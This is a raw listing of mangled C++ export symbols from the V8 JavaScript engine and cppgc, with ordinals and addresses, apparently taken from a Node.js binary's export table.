                                                                                                                                                                                                        ?GetSharedFunctionInfoForScript@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@23@PEAVExtension@3@PEAVScriptData@23@W4CompileOptions@ScriptCompiler@3@W4NoCacheReason@ScriptCompiler@3@W4NativesFlag@23@@Z76850x140aac4e0
                                                                                                                                                                                                        ?GetSharedFunctionInfoForStreamedScript@Compiler@internal@v8@@SA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@23@PEAUScriptStreamingData@23@@Z76860x140aac9e0
                                                                                                                                                                                                        ?GetSharedLibraryAddresses@OS@base@v8@@SA?AV?$vector@USharedLibraryAddress@OS@base@v8@@V?$allocator@USharedLibraryAddress@OS@base@v8@@@std@@@std@@XZ76870x140e60390
                                                                                                                                                                                                        ?GetSharedMemoryStatistics@V8@v8@@SAXPEAVSharedMemoryStatistics@2@@Z76880x140b19600
                                                                                                                                                                                                        ?GetSignature@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAV?$Signature@VValueType@wasm@internal@v8@@@34@I@Z76890x1405405b0
                                                                                                                                                                                                        ?GetSignedOperand@BytecodeArrayIterator@interpreter@internal@v8@@AEBAHHW4OperandType@234@@Z76900x140913dd0
                                                                                                                                                                                                        ?GetSimpleTargetDetails@TransitionsAccessor@internal@v8@@AEAA?AVPropertyDetails@23@VMap@23@@Z76910x140485020
                                                                                                                                                                                                        ?GetSimpleTransition@TransitionsAccessor@internal@v8@@AEAA?AVMap@23@XZ76920x1407bc950
                                                                                                                                                                                                        ?GetSimpleTransitionKey@TransitionsAccessor@internal@v8@@CA?AVName@23@VMap@23@@Z76930x140485050
                                                                                                                                                                                                        ?GetSimplifiedCDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@PEBV?$Signature@VMachineType@internal@v8@@@34@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z76940x140f58030
                                                                                                                                                                                                        ?GetSingle@FrameSummary@internal@v8@@SA?AV123@PEBVCommonFrame@23@@Z76950x140a21b70
                                                                                                                                                                                                        ?GetSlotAboveSPBeforeTailCall@CodeGenerator@compiler@internal@v8@@AEAA_NPEAVInstruction@234@PEAH@Z76960x140ee8350
                                                                                                                                                                                                        ?GetSlotOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVFeedbackSlot@34@H@Z76970x140913e20
                                                                                                                                                                                                        ?GetSmiConstant@TurboAssembler@internal@v8@@IEAA?AVRegister@23@VSmi@23@@Z76980x140504d20
                                                                                                                                                                                                        ?GetSnapshotCount@HeapProfiler@v8@@QEAAHXZ76990x140b19610
                                                                                                                                                                                                        ?GetSource@JSMessageObject@internal@v8@@QEBA?AVString@23@XZ77000x1408393b0
                                                                                                                                                                                                        ?GetSource@Message@v8@@QEBA?AV?$MaybeLocal@VString@v8@@@2@V?$Local@VContext@v8@@@2@@Z77010x140b19620
                                                                                                                                                                                                        ?GetSource@RegExp@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ77020x140b19860
                                                                                                                                                                                                        ?GetSourceBreakLocations@Debug@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z77030x140a61440
                                                                                                                                                                                                        ?GetSourceLine@Message@v8@@QEBA?AV?$MaybeLocal@VString@v8@@@2@V?$Local@VContext@v8@@@2@@Z77040x140b198e0
                                                                                                                                                                                                        ?GetSourceLine@WasmModuleSourceMap@wasm@internal@v8@@QEBA_K_K@Z77050x14053c560
                                                                                                                                                                                                        ?GetSourceLineNumber@SourcePositionTable@internal@v8@@QEBAHH@Z77060x14074e700
                                                                                                                                                                                                        ?GetSourceLocation@Script@debug@v8@@QEBA?AVLocation@23@H@Z77070x140a70a60
                                                                                                                                                                                                        ?GetSourceMappingURL@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ77080x140b19af0
                                                                                                                                                                                                        ?GetSourceOffset@ModuleRequest@v8@@QEBAHXZ77090x1404873b0
                                                                                                                                                                                                        ?GetSourceOffset@Script@debug@v8@@QEBAHAEBVLocation@23@@Z77100x140a70ab0
                                                                                                                                                                                                        ?GetSourcePosition@AsmJsOffsetInformation@wasm@internal@v8@@QEAAHHH_N@Z77110x14053a530
                                                                                                                                                                                                        ?GetSourcePosition@InstructionSequence@compiler@internal@v8@@QEBA_NPEBVInstruction@234@PEAVSourcePosition@34@@Z77120x140ea91f0
                                                                                                                                                                                                        ?GetSourcePosition@SourcePositionTable@compiler@internal@v8@@QEBA?AVSourcePosition@34@PEAVNode@234@@Z77130x140f53eb0
                                                                                                                                                                                                        ?GetSourcePositionBefore@WasmCode@wasm@internal@v8@@QEAAHH@Z77140x14056c0c0
                                                                                                                                                                                                        ?GetSourcePositionTable@CodeGenerator@compiler@internal@v8@@QEAA?AV?$OwnedVector@E@base@4@XZ77150x140ee8420
                                                                                                                                                                                                        ?GetSourcePositions@FeedbackNexus@internal@v8@@QEBA?AV?$vector@HV?$allocator@H@std@@@std@@XZ77160x14087ba70
                                                                                                                                                                                                        ?GetSourceType@CpuProfileNode@v8@@QEBA?AW4SourceType@12@XZ77170x140b19c10
                                                                                                                                                                                                        ?GetSourceURL@UnboundScript@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ77180x140b19c20
                                                                                                                                                                                                        ?GetSpaceName@BaseSpace@internal@v8@@SAPEBDW4AllocationSpace@23@@Z77190x1409f23c0
                                                                                                                                                                                                        ?GetSpecifier@ModuleRequest@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ77200x140a72870
                                                                                                                                                                                                        ?GetSpeculationMode@FeedbackNexus@internal@v8@@QEAA?AW4SpeculationMode@23@XZ77210x14087bd20
                                                                                                                                                                                                        ?GetSpillMoveInsertionLocations@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAUSpillMoveInsertionList@1234@PEBVTopTierRegisterAllocationData@234@@Z77220x140078eb0
                                                                                                                                                                                                        ?GetSpillOperand@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVInstructionOperand@234@XZ77230x140078ea0
                                                                                                                                                                                                        ?GetSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVSpillRange@234@XZ77240x140078ea0
                                                                                                                                                                                                        ?GetSpillRangeOperand@TopLevelLiveRange@compiler@internal@v8@@QEBA?AVAllocatedOperand@234@XZ77250x140f86a80
                                                                                                                                                                                                        ?GetSpillSlotCount@Frame@compiler@internal@v8@@QEBAHXZ77260x140078ae0
                                                                                                                                                                                                        ?GetSplit@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z77270x140b19d40
                                                                                                                                                                                                        ?GetStackArgumentOrder@CallDescriptor@compiler@internal@v8@@QEBA?AW4StackArgumentOrder@34@XZ77280x140343690
                                                                                                                                                                                                        ?GetStackArgumentOrder@CallInterfaceDescriptor@internal@v8@@QEBA?AW4StackArgumentOrder@23@XZ77290x1404bc3a0
                                                                                                                                                                                                        ?GetStackCheckOffset@CodeGenerator@compiler@internal@v8@@QEAAIXZ77300x140ee8440
                                                                                                                                                                                                        ?GetStackDepth@DebugInfo@wasm@internal@v8@@QEAAH_K@Z77310x140561d20
                                                                                                                                                                                                        ?GetStackIndexFromSlot@CallDescriptor@compiler@internal@v8@@QEBAHH@Z77320x1404bc3b0
                                                                                                                                                                                                        ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI32PairDescriptor@internal@v8@@@internal@v8@@SAHXZ77330x140504da0
                                                                                                                                                                                                        ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VBigIntToI64Descriptor@internal@v8@@@internal@v8@@SAHXZ77340x140504da0
                                                                                                                                                                                                        ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VI32PairToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ77350x140504e40
                                                                                                                                                                                                        ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VI64ToBigIntDescriptor@internal@v8@@@internal@v8@@SAHXZ77360x140504da0
                                                                                                                                                                                                        ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VInterpreterDispatchDescriptor@internal@v8@@@internal@v8@@SAHXZ77370x140504e60
                                                                                                                                                                                                        ?GetStackParameterCount@?$StaticCallInterfaceDescriptor@VVoidDescriptor@internal@v8@@@internal@v8@@SAHXZ77380x140504e80
                                                                                                                                                                                                        ?GetStackParameterCount@CallInterfaceDescriptor@internal@v8@@QEBAHXZ77390x1404bc3d0
                                                                                                                                                                                                        ?GetStackParameterDelta@CallDescriptor@compiler@internal@v8@@QEBAHPEBV1234@@Z77400x140eab6f0
                                                                                                                                                                                                        ?GetStackSample@Isolate@v8@@QEAAXAEBURegisterState@2@PEAPEAX_KPEAUSampleInfo@2@@Z77410x140b19d50
                                                                                                                                                                                                        ?GetStackSample@TickSample@internal@v8@@SA_NPEAVIsolate@23@PEAURegisterState@3@W4RecordCEntryFrame@123@PEAPEAX_KPEAUSampleInfo@3@PEAW4StateTag@3@_N@Z77420x140745550
                                                                                                                                                                                                        ?GetStackStart@Stack@base@v8@@SA?AUStackSlot@123@XZ77430x140e605e0
                                                                                                                                                                                                        ?GetStackTrace@Exception@v8@@SA?AV?$Local@VStackTrace@v8@@@2@V?$Local@VValue@v8@@@2@@Z77440x140b19e40
                                                                                                                                                                                                        ?GetStackTrace@Message@v8@@QEBA?AV?$Local@VStackTrace@v8@@@2@XZ77450x140b19ed0
                                                                                                                                                                                                        ?GetStackValue@DebugInfo@wasm@internal@v8@@QEAA?AVWasmValue@234@H_K00PEAVIsolate@34@@Z77460x140561d70
                                                                                                                                                                                                        ?GetStartColumn@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z77470x140b1a130
                                                                                                                                                                                                        ?GetStartColumn@Message@v8@@QEBAHXZ77480x140b1a150
                                                                                                                                                                                                        ?GetStartPosition@Message@v8@@QEBAHXZ77490x140b1a2c0
                                                                                                                                                                                                        ?GetStartTime@CpuProfile@v8@@QEBA_JXZ77500x140b1a430
                                                                                                                                                                                                        ?GetState@SourcePositionTableIterator@internal@v8@@QEBA?AUIndexAndPositionState@123@XZ77510x1404850f0
                                                                                                                                                                                                        ?GetStatus@Module@v8@@QEBA?AW4Status@12@XZ77520x140b1a450
                                                                                                                                                                                                        ?GetStdoutMutex@StdoutStream@internal@v8@@CAPEAVRecursiveMutex@base@3@XZ77530x1406b4100
                                                                                                                                                                                                        ?GetStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AW4FeedbackSlotKind@23@W4LanguageMode@23@@Z77540x140485120
                                                                                                                                                                                                        ?GetStreamingCompilationOwnership@WasmEngine@wasm@internal@v8@@QEAA_N_K@Z77550x140557ae0
                                                                                                                                                                                                        ?GetString@Version@internal@v8@@SAXV?$Vector@D@base@3@@Z77560x1406b30c0
                                                                                                                                                                                                        ?GetStringCountForTesting@StringsStorage@internal@v8@@QEBA_KXZ77570x1402e2210
                                                                                                                                                                                                        ?GetStringOption@Intl@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@PEBDV?$vector@PEBDV?$allocator@PEBD@std@@@std@@2PEAV?$unique_ptr@$$BY0A@DU?$default_delete@$$BY0A@D@std@@@8@@Z77580x1408720f0
                                                                                                                                                                                                        ?GetStrongCrossThreadPersistentRegion@HeapBase@internal@cppgc@@QEAAAEAVCrossThreadPersistentRegion@23@XZ77590x140450190
                                                                                                                                                                                                        ?GetStrongCrossThreadPersistentRegion@HeapBase@internal@cppgc@@QEBAAEBVCrossThreadPersistentRegion@23@XZ77600x140450190
                                                                                                                                                                                                        ?GetStrongGcSubrootName@V8HeapExplorer@internal@v8@@AEAAPEBDVObject@23@@Z77610x140757f40
                                                                                                                                                                                                        ?GetStrongPersistentRegion@HeapBase@internal@cppgc@@QEAAAEAVPersistentRegion@23@XZ77620x1404501a0
                                                                                                                                                                                                        ?GetStrongPersistentRegion@HeapBase@internal@cppgc@@QEBAAEBVPersistentRegion@23@XZ77630x1404501a0
                                                                                                                                                                                                        ?GetStrongValue@MapRef@compiler@internal@v8@@QEBA?AV?$Optional@VObjectRef@compiler@internal@v8@@@base@4@VInternalIndex@34@@Z77640x140e8a830
                                                                                                                                                                                                        ?GetStructType@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAVStructType@234@I@Z77650x1405405b0
                                                                                                                                                                                                        ?GetStubCallContextParamIndex@Linkage@compiler@internal@v8@@SAHH@Z77660x1402e7500
                                                                                                                                                                                                        ?GetStubCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@AEBVCallInterfaceDescriptor@34@HV?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@V?$Flags@W4Property@Operator@compiler@internal@v8@@E@94@W4StubCallMode@34@@Z77670x140eab790
                                                                                                                                                                                                        ?GetSuperConstructor@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@@Z77680x14091e4c0
                                                                                                                                                                                                        ?GetSuperConstructor@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ77690x140f3cac0
                                                                                                                                                                                                        ?GetSymbol@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ77700x140775110
                                                                                                                                                                                                        ?GetSymbol@StringsStorage@internal@v8@@AEAAPEBDVSymbol@23@@Z77710x140746890
                                                                                                                                                                                                        ?GetSystemEntryName@V8HeapExplorer@internal@v8@@AEAAPEBDVHeapObject@23@@Z77720x140758100
                                                                                                                                                                                                        ?GetTaggedParameterSlots@CallDescriptor@compiler@internal@v8@@QEBAIXZ77730x140eabaf0
                                                                                                                                                                                                        ?GetTaggedPointerRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z77740x1410a61c0
                                                                                                                                                                                                        ?GetTaggedRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@VTruncation@234@@Z77750x1410a65b0
                                                                                                                                                                                                        ?GetTaggedSignedRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z77760x1410a6c00
                                                                                                                                                                                                        ?GetTarget@Proxy@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ77770x140a72990
                                                                                                                                                                                                        ?GetTarget@TransitionsAccessor@internal@v8@@QEAA?AVMap@23@H@Z77780x140485130
                                                                                                                                                                                                        ?GetTargetDetails@TransitionsAccessor@internal@v8@@SA?AVPropertyDetails@23@VName@23@VMap@23@@Z77790x1404851a0
                                                                                                                                                                                                        ?GetTargetFromRaw@TransitionsAccessor@internal@v8@@CA?AVMap@23@VMaybeObject@23@@Z77800x1404851e0
                                                                                                                                                                                                        ?GetTemplateObject@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@_KH@Z77810x14091e630
                                                                                                                                                                                                        ?GetTemplateObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVTemplateObjectDescriptionRef@234@AEBVSharedFunctionInfoRef@234@AEBUFeedbackSource@234@@Z77820x140f3cad0
                                                                                                                                                                                                        ?GetTemporaryObjectTrackingDisabled@Debug@internal@v8@@AEBA_NXZ77830x140a61610
                                                                                                                                                                                                        ?GetThreadInWasmThreadLocalAddress@trap_handler@internal@v8@@YAPEAHXZ77840x1406217a0
                                                                                                                                                                                                        ?GetThreadLocal@Thread@base@v8@@SAPEAXH@Z77850x140e60600
                                                                                                                                                                                                        ?GetTitle@CpuProfile@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ77860x140b1a4e0
                                                                                                                                                                                                        ?GetToNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ77870x140078d50
                                                                                                                                                                                                        ?GetToPrimitive@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z77880x140b1a540
                                                                                                                                                                                                        ?GetToStringTag@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z77890x140b1a550
                                                                                                                                                                                                        ?GetTop@FrameSummary@internal@v8@@SA?AV123@PEBVCommonFrame@23@@Z77900x140a21d10
                                                                                                                                                                                                        ?GetTopDownRoot@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@XZ77910x1402c3720
                                                                                                                                                                                                        ?GetTotalAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ77920x14104c8a0
                                                                                                                                                                                                        ?GetTotalAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ77930x14104c900
                                                                                                                                                                                                        ?GetTotalFrameSlotCount@Frame@compiler@internal@v8@@QEBAHXZ77940x1404bc3e0
                                                                                                                                                                                                        ?GetTotalInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z77950x140ea3710
                                                                                                                                                                                                        ?GetTraceDescriptor@TraceTraitFromInnerAddressImpl@internal@cppgc@@SA?AUTraceDescriptor@3@PEBX@Z77960x140451560
                                                                                                                                                                                                        ?GetTraceNodeId@AddressToTraceMap@internal@v8@@QEAAI_K@Z77970x140763530
                                                                                                                                                                                                        ?GetTracingController@DefaultPlatform@cppgc@@UEAAPEAVTracingController@v8@@XZ77980x140467660
                                                                                                                                                                                                        ?GetTracingController@Platform@cppgc@@UEAAPEAVTracingController@v8@@XZ77990x140457250
                                                                                                                                                                                                        ?GetTracingController@TraceEventHelper@tracing@internal@v8@@SAPEAVTracingController@4@XZ78000x1406b7780
                                                                                                                                                                                                        ?GetTracingController@node@@YAPEAVTracingController@v8@@XZ78010x1400f9550
                                                                                                                                                                                                        ?GetTrivialHash@StringHasher@internal@v8@@SAIH@Z78020x1404851f0
                                                                                                                                                                                                        ?GetTurboCfgFileName@Isolate@internal@v8@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEAV123@@Z78030x140a12290
                                                                                                                                                                                                        ?GetTurboStatistics@Isolate@internal@v8@@QEAAPEAVCompilationStatistics@23@XZ78040x140a12500
                                                                                                                                                                                                        ?GetType@HeapGraphEdge@v8@@QEBA?AW4Type@12@XZ78050x1404bf1e0
                                                                                                                                                                                                        ?GetType@HeapGraphNode@v8@@QEBA?AW4Type@12@XZ78060x140b1a560
                                                                                                                                                                                                        ?GetType@NodeProperties@compiler@internal@v8@@SA?AVType@234@PEBVNode@234@@Z78070x1404bc3f0
                                                                                                                                                                                                        ?GetTypeInfo@CFunction@v8@@QEBAPEBVCFunctionInfo@2@XZ78080x140078d50
                                                                                                                                                                                                        ?GetTypeName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@H@Z78090x140561e20
                                                                                                                                                                                                        ?GetTypeOrAny@NodeProperties@compiler@internal@v8@@SA?AVType@234@PEBVNode@234@@Z78100x140eacf70
                                                                                                                                                                                                        ?GetTypedArrayStringTag@JSHeapBroker@compiler@internal@v8@@QEAA?AVStringRef@234@W4ElementsKind@34@@Z78110x140f2f6a0
                                                                                                                                                                                                        ?GetTypesForSourcePositions@FeedbackNexus@internal@v8@@QEBA?AV?$vector@V?$Handle@VString@internal@v8@@@internal@v8@@V?$allocator@V?$Handle@VString@internal@v8@@@internal@v8@@@std@@@std@@I@Z78120x14087bd70
                                                                                                                                                                                                        ?GetUnboundModuleScript@Module@v8@@QEAA?AV?$Local@VUnboundModuleScript@v8@@@2@XZ78130x140b1a570
                                                                                                                                                                                                        ?GetUnboundScript@Script@v8@@QEAA?AV?$Local@VUnboundScript@v8@@@2@XZ78140x140b1a680
                                                                                                                                                                                                        ?GetUnresolvedPrivateNameTail@ClassScope@internal@v8@@QEAA?AVIterator@?$ThreadedListBase@VVariableProxy@internal@v8@@UEmptyBase@base@3@UUnresolvedNext@123@@base@3@XZ78150x140af56d0
                                                                                                                                                                                                        ?GetUnscopables@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z78160x140b1a700
                                                                                                                                                                                                        ?GetUnsignedImmediateOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z78170x140913e90
                                                                                                                                                                                                        ?GetUnsignedOperand@BytecodeArrayIterator@interpreter@internal@v8@@AEBAIHW4OperandType@234@@Z78180x140913ed0
                                                                                                                                                                                                        ?GetUnwindInfo@Assembler@internal@v8@@QEBA?AVBuiltinUnwindInfo@win64_unwindinfo@23@XZ78190x14050ca00
                                                                                                                                                                                                        ?GetUsePtr@Node@compiler@internal@v8@@AEAAPEAUUse@1234@H@Z78200x1404bc400
                                                                                                                                                                                                        ?GetUserTime@OS@base@v8@@SAHPEAI0@Z78210x140e60610
                                                                                                                                                                                                        ?GetVFormatted@StringsStorage@internal@v8@@AEAAPEBDPEBDPEAD@Z78220x1407469c0
                                                                                                                                                                                                        ?GetValue@Descriptor@internal@v8@@QEBA?AVMaybeObjectHandle@23@XZ78230x140485200
                                                                                                                                                                                                        ?GetValue@MapUpdater@internal@v8@@AEBA?AVObject@23@VInternalIndex@23@@Z78240x140818a70
                                                                                                                                                                                                        ?GetValueInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z78250x1404bc430
                                                                                                                                                                                                        ?GetValueInput@NodeProperties@compiler@internal@v8@@SAPEBVNode@234@PEBV5234@H@Z78260x1404bc430
                                                                                                                                                                                                        ?GetValuesNodeFromCache@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@PEAPEAV5234@_KVSparseInputMask@234@@Z78270x140f575a0
                                                                                                                                                                                                        ?GetVariableMode@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4VariableMode@23@W4Kind@ClassLiteralProperty@23@@Z78280x140775480
                                                                                                                                                                                                        ?GetVersion@V8@v8@@SAPEBDXZ78290x1405290d0
                                                                                                                                                                                                        ?GetVersion@Version@internal@v8@@SAPEBDXZ78300x1405290d0
                                                                                                                                                                                                        ?GetVirtualRegister@InstructionSelector@compiler@internal@v8@@QEAAHPEBVNode@234@@Z78310x140ed61b0
                                                                                                                                                                                                        ?GetVirtualRegistersForTesting@InstructionSelector@compiler@internal@v8@@QEBA?BV?$map@IHU?$less@I@std@@V?$allocator@U?$pair@$$CBIH@std@@@2@@std@@XZ78320x140ed6200
                                                                                                                                                                                                        ?GetVisitorId@Map@internal@v8@@SA?AW4VisitorId@23@V123@@Z78330x140812a90
                                                                                                                                                                                                        ?GetWasmCallDescriptor@compiler@internal@v8@@YAPEAVCallDescriptor@123@PEAVZone@23@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@W4UseRetpoline@WasmGraphBuilder@123@W4WasmCallKind@123@_N@Z78340x140efbe10
                                                                                                                                                                                                        ?GetWasmCodeManager@wasm@internal@v8@@YAPEAVWasmCodeManager@123@XZ78350x140557af0
                                                                                                                                                                                                        ?GetWasmEngine@wasm@internal@v8@@YAPEAVWasmEngine@123@XZ78360x140557b00
                                                                                                                                                                                                        ?GetWasmExternalFunction@WasmInstanceObject@internal@v8@@SA?AV?$MaybeHandle@VWasmExternalFunction@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@H@Z78370x140531470
                                                                                                                                                                                                        ?GetWasmFunctionIndex@Message@v8@@QEBAHXZ78380x140b1a710
                                                                                                                                                                                                        ?GetWasmModuleFromId@Delegate@ValueDeserializer@v8@@UEAA?AV?$MaybeLocal@VWasmModuleObject@v8@@@3@PEAVIsolate@3@I@Z78390x140b19470
                                                                                                                                                                                                        ?GetWasmModuleTransferId@Delegate@ValueSerializer@v8@@UEAA?AV?$Maybe@I@3@PEAVIsolate@3@V?$Local@VWasmModuleObject@v8@@@3@@Z78400x140b1a8f0
                                                                                                                                                                                                        ?GetWasmSourceMap@NativeModule@wasm@internal@v8@@QEBAPEAVWasmModuleSourceMap@234@XZ78410x14040f4a0
                                                                                                                                                                                                        ?GetWeakCrossThreadPersistentRegion@HeapBase@internal@cppgc@@QEAAAEAVCrossThreadPersistentRegion@23@XZ78420x1404501b0
                                                                                                                                                                                                        ?GetWeakCrossThreadPersistentRegion@HeapBase@internal@cppgc@@QEBAAEBVCrossThreadPersistentRegion@23@XZ78430x1404501b0
                                                                                                                                                                                                        ?GetWeakPersistentRegion@HeapBase@internal@cppgc@@QEAAAEAVPersistentRegion@23@XZ78440x1404501c0
                                                                                                                                                                                                        ?GetWeakPersistentRegion@HeapBase@internal@cppgc@@QEBAAEBVPersistentRegion@23@XZ78450x1404501c0
                                                                                                                                                                                                        ?GetWireBytesRef@CompiledWasmModule@v8@@QEAA?AV?$MemorySpan@$$CBE@2@XZ78460x140b1a900
                                                                                                                                                                                                        ?GetWireBytesStorage@CompilationState@wasm@internal@v8@@QEBA?AV?$shared_ptr@VWireBytesStorage@wasm@internal@v8@@@std@@XZ78470x14059b3d0
                                                                                                                                                                                                        ?GetWireFormatVersion@ValueDeserializer@v8@@QEBAIXZ78480x140b1a9b0
                                                                                                                                                                                                        ?GetWord32RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z78490x1410a70b0
                                                                                                                                                                                                        ?GetWord64RepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@0VUseInfo@234@@Z78500x1410a7970
                                                                                                                                                                                                        ?GetWorkingSpace@StateValuesCache@compiler@internal@v8@@AEAAPEAV?$array@PEAVNode@compiler@internal@v8@@$07@std@@_K@Z78510x140f57750
                                                                                                                                                                                                        ?GetWrappedFunction@Compiler@internal@v8@@SA?AV?$MaybeHandle@VJSFunction@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@V?$Handle@VFixedArray@internal@v8@@@23@V?$Handle@VContext@internal@v8@@@23@AEBUScriptDetails@23@PEAVScriptData@23@W4CompileOptions@ScriptCompiler@3@W4NoCacheReason@ScriptCompiler@3@@Z78520x140aad410
                                                                                                                                                                                                        ?GetWriteBarrierType@WriteBarrier@internal@cppgc@@SA?AW4Type@123@PEBX0AEAUParams@123@@Z78530x1404501d0
                                                                                                                                                                                                        ?GetWriteBarrierType@WriteBarrier@internal@cppgc@@SA?AW4Type@123@PEBXAEAUParams@123@@Z78540x140450220
                                                                                                                                                                                                        ?GetterCallbackEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z78550x140078990
                                                                                                                                                                                                        ?GetterCallbackEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z78560x14074b9d0
                                                                                                                                                                                                        ?GiveBack@IndexGenerator@internal@v8@@QEAAX_K@Z78570x1409a60f0
                                                                                                                                                                                                        ?Glb@BitsetType@compiler@internal@v8@@SAINN@Z78580x140e9fe20
                                                                                                                                                                                                        ?Global@Context@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ78590x140b1a9c0
                                                                                                                                                                                                        ?Global@DebugEvaluate@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@W4EvaluateGlobalMode@debug@3@W4REPLMode@23@@Z78600x140a73f90
                                                                                                                                                                                                        ?GlobalConstantFor@Factory@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z78610x1409d14d0
                                                                                                                                                                                                        ?GlobalDictionaryPrint@GlobalDictionary@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z78620x140a32000
                                                                                                                                                                                                        ?GlobalIndex@AsmJsScanner@internal@v8@@SA_KH@Z78630x140637170
                                                                                                                                                                                                        ?GlobalSizeOfObjects@Heap@internal@v8@@QEAA_KXZ78640x1409ba4b0
                                                                                                                                                                                                        ?GlobalTearDown@WasmEngine@wasm@internal@v8@@SAXXZ78650x140557b10
                                                                                                                                                                                                        ?GlobalizeReference@V8@v8@@CAPEA_KPEAVIsolate@internal@2@PEA_K@Z78660x140b1ab50
                                                                                                                                                                                                        ?GlobalizeTracedReference@V8@v8@@CAPEA_KPEAVIsolate@internal@2@PEA_K1_N@Z78670x140b1abb0
                                                                                                                                                                                                        ?GoTo@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z78680x14073d6a0
                                                                                                                                                                                                        ?GoTo@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z78690x1404add80
                                                                                                                                                                                                        ?GoToEnd@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXXZ78700x140913260
                                                                                                                                                                                                        ?GoToIndex@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXH@Z78710x1409132a0
                                                                                                                                                                                                        ?GoToStart@BytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAXXZ78720x1409132d0
                                                                                                                                                                                                        ?Goto@CodeAssembler@compiler@internal@v8@@QEAAXPEAVCodeAssemblerLabel@234@@Z78730x140f22b50
                                                                                                                                                                                                        ?Goto@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVRawMachineLabel@234@@Z78740x14108d230
                                                                                                                                                                                                        ?GotoBasicBlock@GraphAssembler@compiler@internal@v8@@IEAAXPEAVBasicBlock@234@@Z78750x140f5abf0
